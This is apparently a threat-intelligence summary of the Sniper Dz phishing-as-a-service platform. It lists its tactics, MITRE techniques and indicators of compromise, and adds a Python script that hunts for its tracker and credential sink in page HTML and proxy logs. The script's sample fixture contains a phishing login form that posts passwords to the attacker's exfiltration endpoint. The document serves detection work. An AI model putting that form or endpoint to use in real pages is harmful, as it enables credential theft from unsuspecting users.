An in-depth look at Sniper Dz, a phishing-as-a-service platform that targets social media and online services, revealing its wide reach with over 140,000 phishing sites linked to it in the last year. The platform offers a free admin panel to generate pages, hosts content behind public proxies, and centralizes credential exfiltration and victim tracking. #SniperDz #Raviral
Keypoints
- Sniper Dz is a popular PhaaS platform with thousands of subscribers on Telegram.
- Over 140,000 phishing websites have been discovered associated with Sniper Dz in the past year.
- The platform offers an admin panel for phishers to generate and host phishing pages.
- Phishing pages can be hosted on Sniper Dz's own infrastructure or downloaded as templates for self-hosting.
- Sniper Dz loads phishing content through public proxy servers, so the backend servers that actually hold the pages are not exposed to takedown or scanning.
- Self-hosted templates are placed on legitimate free hosting and SaaS platforms (Netlify, 000webhost, Glitch, Blogspot), so the phishing pages sit on reputable domains and are harder to flag.
- Stolen credentials are exfiltrated to a centralized infrastructure controlled by Sniper Dz.
MITRE Techniques
- [T1566] Phishing: the Sniper Dz platform supplies the templates, the hosting and the admin panel used to run phishing campaigns.
- [T1056.003] Input Capture: Web Portal Capture: the phishing pages capture credentials entered by victims and post them to a centralized endpoint controlled by Sniper Dz (the original listing cited T1003, OS Credential Dumping, which covers extracting credential material from a compromised host rather than capture through a fake login page).
- [T1027] Obfuscated Files or Information: the phishing template code is heavily obfuscated to evade detection.
- [T1090.002] Proxy: External Proxy: Sniper Dz uses public proxy servers to hide the backend servers hosting the phishing content.
Indicators of Compromise
- [Domain] sniperdz[.]com: Sniper Dz PhaaS platform (admin panel and hosted phishing pages).
- [Domain] proxymesh[.]com: legitimate commercial proxy service whose public proxies Sniper Dz uses to hide the backend serving the phishing content; treat as context for investigations, not as a blocklist entry on its own.
- [Domain] raviral[.]com: Sniper Dz-controlled domain; also redirects victims to other Sniper Dz-owned websites.
- [URL] raviral[.]com/k_fac.php: centralized credential exfiltration endpoint that the phishing forms post to.
- [URL] raviral[.]com/host_style/style/js-track/track.js: victim-tracking script embedded in the phishing pages.
- [Telegram] t[.]me/JokerDzV2: Telegram support channel.
- [Telegram] t[.]me/JokerDzV2/19: tutorial video link.
- [Domain] 6627c220b5daa507c6cca1c5-votedme[.]netlify[.]app: example phishing site on Netlify.
- [Domain] automaticgiveaway[.]000webhostapp[.]com: example phishing site on 000webhost.
- [Domain] climbing-green-botany[.]glitch[.]me: example phishing site on Glitch.
- [Domain] facebookbusiness0078[.]blogspot[.]be: example phishing page hosted on Blogspot.
Note: the Netlify, 000webhost, Glitch and Blogspot entries are tenant subdomains on shared platforms. Block or alert on the full hostname, not the parent domain, and expect the names to rotate; the raviral[.]com tracker and exfiltration endpoint are the more stable pivot.
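Added example, not code from the Unit 42 report or from this summary: a small Python hunter that applies the indicators above in two places where a defender can see them, fetched page HTML (the embedded track.js reference and a form posting to k_fac.php) and web-proxy logs (a client POSTing to the exfiltration endpoint). The page URL, HTML and log lines are constructed for illustration, and the proxy-log layout (timestamp, client IP, method, URL, status) is an assumption; adapt the regex to your proxy's format.

```python
"""Hunt for Sniper Dz artefacts in page HTML and in web-proxy logs.

Added example, not code from the Unit 42 report. Indicator values come from
the IoC list above; the sample page, its URL and the log lines are constructed.
"""
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Indicators from the report, refanged for matching.
EXFIL_HOST = "raviral.com"
EXFIL_PATH = "/k_fac.php"                              # credential sink
TRACKER_PATH = "/host_style/style/js-track/track.js"   # victim tracker
# Free hosting providers seen carrying self-hosted templates.
ABUSED_HOSTING_SUFFIXES = (".netlify.app", ".000webhostapp.com", ".glitch.me", ".blogspot.be")


class _RefCollector(HTMLParser):
    """Collect external script sources and form targets from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.script_srcs: list[str] = []
        self.form_actions: list[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])


def _host_path(url: str, base: str = "") -> tuple[str, str]:
    """Resolve a possibly relative reference against the page URL, split host/path."""
    parts = urlsplit(urljoin(base, url) if base else url)
    return (parts.hostname or "").lower(), parts.path


@dataclass
class Verdict:
    hits: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.hits)


def scan_html(page_url: str, html: str) -> Verdict:
    """Flag a page that carries the Sniper Dz tracker or posts to its credential sink."""
    v = Verdict()
    host, _ = _host_path(page_url)
    if host.endswith(ABUSED_HOSTING_SUFFIXES):
        v.hits.append(f"hosted on free provider abused for templates: {host}")
    p = _RefCollector()
    p.feed(html)
    for src in p.script_srcs:
        h, path = _host_path(src, page_url)
        if h == EXFIL_HOST and path == TRACKER_PATH:
            v.hits.append(f"embedded tracker script: {src}")
    for action in p.form_actions:
        h, path = _host_path(action, page_url)
        if h == EXFIL_HOST and path == EXFIL_PATH:
            v.hits.append(f"form posts to exfiltration endpoint: {action}")
    return v


# Assumed proxy-log layout: "<timestamp> <client-ip> <method> <url> <status>".
_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})"
)


def scan_proxy_log(lines) -> list[tuple[str, str]]:
    """Return (client, url) for every POST to the exfiltration endpoint."""
    alerts = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        h, path = _host_path(m["url"])
        if m["method"] == "POST" and h == EXFIL_HOST and path == EXFIL_PATH:
            alerts.append((m["client"], m["url"]))
    return alerts


# Constructed sample data (not captured from a real Sniper Dz page).
SAMPLE_PAGE_URL = "https://automaticgiveaway.000webhostapp.com/login.html"
SAMPLE_HTML = """<html><head>
<script src="https://raviral.com/host_style/style/js-track/track.js"></script>
</head><body>
<form method="post" action="https://raviral.com/k_fac.php">
  <input name="email"><input name="pass" type="password">
</form></body></html>"""
SAMPLE_PROXY_LOG = [
    "2024-09-30T10:01:02Z 10.0.0.5 GET https://automaticgiveaway.000webhostapp.com/login.html 200",
    "2024-09-30T10:01:09Z 10.0.0.5 POST https://raviral.com/k_fac.php 302",
    "2024-09-30T10:02:11Z 10.0.0.7 GET https://example.org/ 200",
]

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_PAGE_URL, SAMPLE_HTML).hits:
        print("page:", hit)
    for client, url in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("proxy:", client, "->", url)
```

Relative form actions are resolved against the page URL, so a template hosted on raviral[.]com itself that posts to `../k_fac.php` is caught as well as one on a free host that posts to the absolute URL. The proxy-log check keys on the POST to k_fac.php rather than on the GET of the phishing page, because the page hostnames rotate across free providers while the sink is the stable indicator.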
Read more: https://unit42.paloaltonetworks.com/phishing-platform-sniper-dz-unique-tactics/